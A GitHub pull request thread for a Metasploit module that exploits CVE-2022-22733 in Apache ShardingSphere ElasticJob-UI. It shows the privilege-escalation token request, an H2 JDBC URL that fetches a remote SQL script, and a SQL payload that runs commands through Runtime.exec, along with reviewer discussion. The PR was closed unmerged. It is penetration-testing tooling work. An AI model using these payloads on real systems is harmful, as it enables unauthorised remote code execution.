Create apache_shardingsphere_cve_2022_22733.rb
rapid7/metasploit-framework pull request #17978
Opened 2023-05-10 05:00 UTC by Zeyad-Azima

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/apache_shardingsphere_cve_2022_22733`
- [x] Start http server has your malicious sql file for JDBC attack.
- [x] `set RHOSTS target`
- [x] `set RPORT port`
- [x] `set JDBC url`
- [x] **Exploitation Blog** ([Here](https://www.vicarius.io/vsociety/blog/unique-exploit-cve-2022-22733-privilege-escalation-and-rce))

You can check out also a full analysis for the vulnerability from [Here](https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation).

2023-05-10 15:52 UTC, gwillcox-r7 commented
Additional documentation on how this module is meant to work will be needed in order to test this. In particular your step `Start http server has your malicious sql file for JDBC attack.` seems to suggest using an external tool outside of Metasploit to complete this attack which raises some concerns. Can you provide more clarity on what you meant by this step?

2023-05-11 05:47 UTC, Zeyad-Azima commented
> Additional documentation on how this module is meant to work will be needed in order to test this. In particular your step `Start http server has your malicious sql file for JDBC attack.` seems to suggest using an external tool outside of Metasploit to complete this attack which raises some concerns. Can you provide more clarity on what you meant by this step?

### The `JDBC` option in case you don't know what is it, You can check it from [here](https://pyn3rd.github.io/2022/06/06/Make-JDBC-Attacks-Brillian-Again-I/).
Basically, If you have a privileged account like the `root` account, You will be able to create a database base connection.
Now, You may be wondering, If we have the root account credentials, Why we would need to Retrieve it's token ?. So, Basically to perform a connection throug the JDBC we need high-privileges and to automate this process let's see how it works first. 

![image](https://github.com/rapid7/metasploit-framework/assets/62406753/4e4be243-bc34-417c-aadf-faa157acce9e)

As you can see when we logged-in as guest we are not able to add any data source. But, If we login with the root account. We can see that we have the privileges to add data source and test the connection:

![image](https://github.com/rapid7/metasploit-framework/assets/62406753/06ac9719-2827-4062-ad98-aca4fc4b41e4)

Now, Under the Event Tracer Data Source click on Add button and add the following:

![image](https://github.com/rapid7/metasploit-framework/assets/62406753/f1d30e53-fb6f-4e5f-805f-6bf0ff0dca1f)

What did we done here?. We named Our data source, then used the h2 driver the H2 itself is a relational database management system, and the org.h2.driver is a JDBC driver used to connect to an H2 database from Java. The URL value:

```
jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.0.162:8000/poc.sql'
```

Basically, This is a JDBC connection string which will connect a H2 in memory database with the name we give which is testdb. Then, `TRACE_LEVEL_SYSTEM_OUT=3` parameter enables trace logging to be printed to the console. Finally, `INIT=RUNSCRIPT FROM 'http://192.168.0.162:8000/poc.sql'` parameter specifies that the `poc.sql` script located at our URL should be executed when the database is initialized. But, What is inside poc.sql file ?:

```
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('calc.exe')
```

In short words, This sql script uses the H2 database ability to create an alias to execute command and here we executing calc.exe for the demo of the exploit. Now, Let's start our http server that will host our poc.sql script and after that we click on Test Connect Button:

![firefox_aYpCgKHiha](https://github.com/rapid7/metasploit-framework/assets/62406753/378be99e-29d8-49e5-888b-538c5b6eeb62)


Now, As we understand it clearly we can run our metasploit module to perform all of these.

![vmware_4p7AtSwR60](https://github.com/rapid7/metasploit-framework/assets/62406753/7b6dcf50-7e77-4c92-8904-7ab6c00f0162)
```
[*] Attempting to authenticate...
[+] Authenticated Successfully
[*] Root username: root
[*] Root password: root
[*] Attempting to authenticate with root credentials...
[+] Authenticated with root credentials successfully
[*] Attempting JDBC attack...
[+] JDBC attack successful
```

2023-05-11 14:12 UTC, Zeyad-Azima commented
[apache_shardingsphere_cve_2022_22733.md](https://github.com/rapid7/metasploit-framework/files/11453000/apache_shardingsphere_cve_2022_22733.md)


> Additional documentation on how this module is meant to work will be needed in order to test this. In particular your step `Start http server has your malicious sql file for JDBC attack.` seems to suggest using an external tool outside of Metasploit to complete this attack which raises some concerns. Can you provide more clarity on what you meant by this step?

hello @gwillcox-r7 i have modified the doc in this pull request you can check it out, Its the documentation for the module. Thanks.

2023-05-11 14:35 UTC, gwillcox-r7 commented
> [apache_shardingsphere_cve_2022_22733.md](https://github.com/rapid7/metasploit-framework/files/11453000/apache_shardingsphere_cve_2022_22733.md)
> 
> > Additional documentation on how this module is meant to work will be needed in order to test this. In particular your step `Start http server has your malicious sql file for JDBC attack.` seems to suggest using an external tool outside of Metasploit to complete this attack which raises some concerns. Can you provide more clarity on what you meant by this step?
> 
> hello @gwillcox-r7 i have modified the doc in this pull request you can check it out, Its the documentation for the module. Thanks.

Hi there, this PR has not been updated to include the doc file as part of this pull request. Please update this PR to add a commit including this file and then I can review it further.

2023-05-11 15:42 UTC, cdelafuente-r7 commented on modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
> +    decoded_json = JSON.parse(decoded_access_token)
`JSON.parse` might raise an exception and should be handled here.

2023-05-11 15:42 UTC, cdelafuente-r7 commented on modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
> +      'data'   => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }.to_json
Please, use `vars_post` instead. This would handle everything for you, including encoding:
```suggestion
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      }
```

2023-05-11 15:42 UTC, cdelafuente-r7 commented on modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
> +  root_access_token = json_res['model']['accessToken']
Same here, `dig` is preferred.

2023-05-31 20:20 UTC, gwillcox-r7 commented
Ping @Zeyad-Azima, do you need any help making the adjustments that @cdelafuente-r7 recommended?

2023-06-05 18:56 UTC, gwillcox-r7 commented
Atticing this as this is still an interesting module but until we get an appropriate documentation file for this module, we will not be able to continue working on this PR. Once an appropriate documentation file is uploaded, lets come back to this and we can reopen this PR and look at getting it landed into framework.

2023-06-05 20:00 UTC, gwillcox-r7 commented
After reading the blog posts a bit more, I realized that as it stands right now, this module will make an arbitrary JDBC connection from the target to a URL we control but it will never actually create a server to serve up that payload. In fact there is no reference to the payload at all.

Reading the article I'm guessing this is what is needed:

```
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('calc.exe')
```

Where we replace `calc.exe` with the command we actually want to execute for our target payload to work. However feel free to correct me if I am wrong here.

2023-06-05 20:01 UTC, gwillcox-r7 commented on modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
> +require 'base64'
Removed this with https://github.com/rapid7/metasploit-framework/pull/17978/commits/875297aec62e2d7124c77f576a969e47b4edca44

2023-06-05 23:12 UTC, gwillcox-r7 requested changes

2023-06-06 17:11 UTC, gwillcox-r7 commented on modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
> +      'data'   => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }.to_json
@cdelafuente-r7 Tried your suggestion but this didn't in fact format the request as you expected. Seems like the author's original suggestion may be needed.

2023-06-06 19:05 UTC, gwillcox-r7 commented
Mostly got this working but running into this odd error when trying to retrieve the SQL file with commands to execute:

```
POST /api/data-source/connectTest HTTP/1.1
Host: 127.0.0.1:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.1; rv:108.0) Gecko/20100101 Firefox/108.0
Access-Token: eyJyb290VXNlcm5hbWUiOiJyb290Iiwicm9vdFBhc3N3b3JkIjoicm9vdCIsImd1ZXN0VXNlcm5hbWUiOiJndWVzdCIsImd1ZXN0UGFzc3dvcmQiOiJndWVzdCIsImJhc2U2NCI6eyJlbmNvZGVUYWJsZSI6WzY1LDY2LDY3LDY4LDY5LDcwLDcxLDcyLDczLDc0LDc1LDc2LDc3LDc4LDc5LDgwLDgxLDgyLDgzLDg0LDg1LDg2LDg3LDg4LDg5LDkwLDk3LDk4LDk5LDEwMCwxMDEsMTAyLDEwMywxMDQsMTA1LDEwNiwxMDcsMTA4LDEwOSwxMTAsMTExLDExMiwxMTMsMTE0LDExNSwxMTYsMTE3LDExOCwxMTksMTIwLDEyMSwxMjIsNDgsNDksNTAsNTEsNTIsNTMsNTQsNTUsNTYsNTcsNDMsNDddLCJkZWNvZGVUYWJsZSI6Wy0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLDYyLC0xLDYyLC0xLDYzLDUyLDUzLDU0LDU1LDU2LDU3LDU4LDU5LDYwLDYxLC0xLC0xLC0xLC0xLC0xLC0xLC0xLDAsMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMsMjQsMjUsLTEsLTEsLTEsLTEsNjMsLTEsMjYsMjcsMjgsMjksMzAsMzEsMzIsMzMsMzQsMzUsMzYsMzcsMzgsMzksNDAsNDEsNDIsNDMsNDQsNDUsNDYsNDcsNDgsNDksNTAsNTFdLCJkZWNvZGVTaXplIjozLCJlbmNvZGVTaXplIjo0LCJQQUQiOjYxLCJwYWQiOjYxLCJ1bmVuY29kZWRCbG9ja1NpemUiOjMsImVuY29kZWRCbG9ja1NpemUiOjQsImxpbmVMZW5ndGgiOjAsImNodW5rU2VwYXJhdG9yTGVuZ3RoIjoyfSwiZ3NvbiI6eyJjYWxscyI6eyJ0aHJlYWRMb2NhbEhhc2hDb2RlIjo0NzU1NTIxNTh9LCJ0eXBlVG9rZW5DYWNoZSI6eyJqYXZhLmxhbmcucmVmbGVjdC5UeXBlIjp7fSwiY29tLmdvb2dsZS5nc29uLkV4Y2x1c2lvblN0cmF0ZWd5Ijp7fSwiY29tLmdvb2dsZS5nc29uLkluc3RhbmNlQ3JlYXRvclx1MDAzYz9cdTAwM2UiOnt9LCJjb20uZ29vZ2xlLmdzb24uRmllbGROYW1pbmdTdHJhdGVneSI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5iaW5kLkNvbGxlY3Rpb25UeXBlQWRhcHRlckZhY3RvcnkiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5NYXBUeXBlQWRhcHRlckZhY3RvcnkiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5TcWxEYXRlVHlwZUFkYXB0ZXIkMSI6e30sImNvbS5nb29nbGUuZ3Nvbi5UeXBlQWRhcHRlckZhY3RvcnkiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5EYXRlVHlwZUFkYXB0ZXIkMSI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5Db25zdHJ1Y3RvckNvbnN0cnVjdG9yIjp7fSwib3JnLmFwYWNoZS5zaGFyZGluZ3NwaGVyZS5lbGFzdGljam9iLmxpdGUudWkuc2VjdXJpdHkuVXNlckF1dGhlbnRpY2F0aW9uU2VydmljZSI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5iaW5kLlJlZmxlY3RpdmVUeXBlQWRhcHRlckZhY3RvcnkiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMzAiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMzMiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMjYiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMzUiOnt9LCJqYXZhLmxhbmcuU3RyaW5nIjp7fSwiYm9vbGVhbiI6e30sIm9yZy5hcGFjaGUuY29tbW9ucy5jb2RlYy5iaW5hcnkuQmFzZTY0Ijp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuSnNvbkFkYXB0ZXJBbm5vdGF0aW9uVHlwZUFkYXB0ZXJGYWN0b3J5Ijp7fSwiamF2YS5sYW5nLkNsYXNzXHUwMDNjP1x1MDAzZSI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5iaW5kLk9iamVjdFR5cGVBZGFwdGVyJDEiOnt9LCJpbnQiOnt9LCJqYXZhLmxhbmcuQnl0ZSI6e30sImNvbS5nb29nbGUuZ3Nvbi5Mb25nU2VyaWFsaXphdGlvblBvbGljeSQxIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLnJlZmxlY3QuUmVmbGVjdGlvbkFjY2Vzc29yIjp7fSwiY29tLmdvb2dsZS5nc29uLkxvbmdTZXJpYWxpemF0aW9uUG9saWN5Ijp7fSwiZG91YmxlIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuVHlwZUFkYXB0ZXJzJDMyIjp7fSwiYnl0ZSI6e30sImJ5dGVbXSI6e30sImNvbS5nb29nbGUuZ3Nvbi5yZWZsZWN0LlR5cGVUb2tlblx1MDAzYz9cdTAwM2UiOnt9LCJjb20uZ29vZ2xlLmdzb24uVHlwZUFkYXB0ZXJcdTAwM2M/XHUwMDNlIjp7fSwiamF2YS51dGlsLk1hcFx1MDAzY2NvbS5nb29nbGUuZ3Nvbi5yZWZsZWN0LlR5cGVUb2tlblx1MDAzYz9cdTAwM2UsIGNvbS5nb29nbGUuZ3Nvbi5UeXBlQWRhcHRlclx1MDAzYz9cdTAwM2VcdTAwM2UiOnt9LCJqYXZhLmxhbmcuQm9vbGVhbiI6e30sImNvbS5nb29nbGUuZ3Nvbi5GaWVsZE5hbWluZ1BvbGljeSQxIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuVHlwZUFkYXB0ZXJzJDM0Ijp7fSwiamF2YS51dGlsLk1hcFx1MDAzY2phdmEubGFuZy5yZWZsZWN0LlR5cGUsIGNvbS5nb29nbGUuZ3Nvbi5JbnN0YW5jZUNyZWF0b3JcdTAwM2M/XHUwMDNlXHUwMDNlIjp7fSwiamF2YS51dGlsLkxpc3RcdTAwM2Njb20uZ29vZ2xlLmdzb24uRXhjbHVzaW9uU3RyYXRlZ3lcdTAwM2UiOnt9LCJqYXZhLmxhbmcuSW50ZWdlciI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5iaW5kLlRpbWVUeXBlQWRhcHRlciQxIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLkV4Y2x1ZGVyIjp7fSwiY29tLmdvb2dsZS5nc29uLkdzb24iOnt9LCJqYXZhLmxhbmcuRG91YmxlIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLnJlZmxlY3QuUHJlSmF2YTlSZWZsZWN0aW9uQWNjZXNzb3IiOnt9LCJqYXZhLnV0aWwuTGlzdFx1MDAzY2NvbS5nb29nbGUuZ3Nvbi5UeXBlQWRhcHRlckZhY3RvcnlcdTAwM2UiOnt9LCJqYXZhLmxhbmcuVGhyZWFkTG9jYWxcdTAwM2NqYXZhLnV0aWwuTWFwXHUwMDNjY29tLmdvb2dsZS5nc29uLnJlZmxlY3QuVHlwZVRva2VuXHUwMDNjP1x1MDAzZSwgY29tLmdvb2dsZS5nc29uLkdzb24kRnV0dXJlVHlwZUFkYXB0ZXJcdTAwM2M/XHUwMDNlXHUwMDNlXHUwMDNlIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuQXJyYXlUeXBlQWRhcHRlciQxIjp7fX0sImNvbnN0cnVjdG9yQ29uc3RydWN0b3IiOnsiaW5zdGFuY2VDcmVhdG9ycyI6e30sImFjY2Vzc29yIjp7fX0sImpzb25BZGFwdGVyRmFjdG9yeSI6eyJjb25zdHJ1Y3RvckNvbnN0cnVjdG9yIjp7Imluc3RhbmNlQ3JlYXRvcnMiOnt9LCJhY2Nlc3NvciI6e319fSwiZmFjdG9yaWVzIjpbbnVsbCxudWxsLHsidmVyc2lvbiI6LTEuMCwibW9kaWZpZXJzIjoxMzYsInNlcmlhbGl6ZUlubmVyQ2xhc3NlcyI6dHJ1ZSwicmVxdWlyZUV4cG9zZSI6ZmFsc2UsInNlcmlhbGl6YXRpb25TdHJhdGVnaWVzIjpbXSwiZGVzZXJpYWxpemF0aW9uU3RyYXRlZ2llcyI6W119LG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLHsiY29uc3RydWN0b3JDb25zdHJ1Y3RvciI6eyJpbnN0YW5jZUNyZWF0b3JzIjp7fSwiYWNjZXNzb3IiOnt9fX0seyJjb25zdHJ1Y3RvckNvbnN0cnVjdG9yIjp7Imluc3RhbmNlQ3JlYXRvcnMiOnt9LCJhY2Nlc3NvciI6e319LCJjb21wbGV4TWFwS2V5U2VyaWFsaXphdGlvbiI6ZmFsc2V9LHsiY29uc3RydWN0b3JDb25zdHJ1Y3RvciI6eyJpbnN0YW5jZUNyZWF0b3JzIjp7fSwiYWNjZXNzb3IiOnt9fX0sbnVsbCx7ImNvbnN0cnVjdG9yQ29uc3RydWN0b3IiOnsiaW5zdGFuY2VDcmVhdG9ycyI6e30sImFjY2Vzc29yIjp7fX0sImZpZWxkTmFtaW5nUG9saWN5IjoiSURFTlRJVFkiLCJleGNsdWRlciI6eyJ2ZXJzaW9uIjotMS4wLCJtb2RpZmllcnMiOjEzNiwic2VyaWFsaXplSW5uZXJDbGFzc2VzIjp0cnVlLCJyZXF1aXJlRXhwb3NlIjpmYWxzZSwic2VyaWFsaXphdGlvblN0cmF0ZWdpZXMiOltdLCJkZXNlcmlhbGl6YXRpb25TdHJhdGVnaWVzIjpbXX0sImpzb25BZGFwdGVyRmFjdG9yeSI6eyJjb25zdHJ1Y3RvckNvbnN0cnVjdG9yIjp7Imluc3RhbmNlQ3JlYXRvcnMiOnt9LCJhY2Nlc3NvciI6e319fSwiYWNjZXNzb3IiOnt9fV0sImV4Y2x1ZGVyIjp7InZlcnNpb24iOi0xLjAsIm1vZGlmaWVycyI6MTM2LCJzZXJpYWxpemVJbm5lckNsYXNzZXMiOnRydWUsInJlcXVpcmVFeHBvc2UiOmZhbHNlLCJzZXJpYWxpemF0aW9uU3RyYXRlZ2llcyI6W10sImRlc2VyaWFsaXphdGlvblN0cmF0ZWdpZXMiOltdfSwiZmllbGROYW1pbmdTdHJhdGVneSI6IklERU5USVRZIiwiaW5zdGFuY2VDcmVhdG9ycyI6e30sInNlcmlhbGl6ZU51bGxzIjpmYWxzZSwiY29tcGxleE1hcEtleVNlcmlhbGl6YXRpb24iOmZhbHNlLCJnZW5lcmF0ZU5vbkV4ZWN1dGFibGVKc29uIjpmYWxzZSwiaHRtbFNhZmUiOnRydWUsInByZXR0eVByaW50aW5nIjpmYWxzZSwibGVuaWVudCI6ZmFsc2UsInNlcmlhbGl6ZVNwZWNpYWxGbG9hdGluZ1BvaW50VmFsdWVzIjpmYWxzZSwiZGF0ZVN0eWxlIjoyLCJ0aW1lU3R5bGUiOjIsImxvbmdTZXJpYWxpemF0aW9uUG9saWN5IjoiREVGQVVMVCIsImJ1aWxkZXJGYWN0b3JpZXMiOltdLCJidWlsZGVySGllcmFyY2h5RmFjdG9yaWVzIjpbXX19
Content-Type: application/json
Content-Length: 203

{"name":"6PVJK5wL","driver":"org.h2.Driver","url":"jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.64.128:9090//gB89owqX.sql'","username":"ZZ5O","password":"rFa02gjNbROa"}
[*] 192.168.64.128:9090 - Sending payload to target...
####################
# Response:
####################
HTTP/1.1 200
Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
Access-Control-Max-Age: 3600
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type,Access-Token
Set-Cookie: JSESSIONID=E0B7060B6D8319A6252505D0F15AEDF3; Path=/; HttpOnly
Content-Type: application/json;charset=UTF-8
Transfer-Encoding: chunked
Date: Tue, 06 Jun 2023 19:02:18 GMT

{"success":false,"errorCode":500,"errorMsg":"IO Exception: \"java.io.IOException: Cannot run program \"\"javac\"\": error=2, No such file or directory\"; SQL statement:\nCREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"123\";}' [90028-196]","model":null}
[-] Exploit aborted due to failure: unexpected-reply: JDBC attack failed. The error message was IO Exception: "java.io.IOException: Cannot run program ""javac"": error=2, No [...]

2023-06-06 20:48 UTC, gwillcox-r7 commented on modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
> +      'data' => { 'name' => 'azima', 'driver' => 'org.h2.Driver', 'url' => "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '#{datastore['JDBC']}'", 'username' => 'a', 'password' => '
This was fixed with https://github.com/rapid7/metasploit-framework/pull/17978/commits/5dd858fb10cb27e86018fc5bc68976a29962c870

2023-06-06 20:51 UTC, gwillcox-r7 commented on modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
> +    print_good('JDBC attack successful')
Should be addressed with updates in https://github.com/rapid7/metasploit-framework/pull/17978/commits/5dd858fb10cb27e86018fc5bc68976a29962c870

2023-06-07 14:53 UTC, gwillcox-r7 commented
Marking this as delayed. I can't seem to solve the issue above and trying to install this product on non-Docker devices keeps throwing up errors with Java at the moment.

2023-06-22 17:07 UTC, gwillcox-r7 commented
@Zeyad-Azima Any update on the above? If not I'm going to have to attic this PR until we can get a solution.

2023-10-03 21:55 UTC, bwatters-r7 commented
I'm going to go ahead and attic this.

2023-10-03 21:56 UTC, closed without merging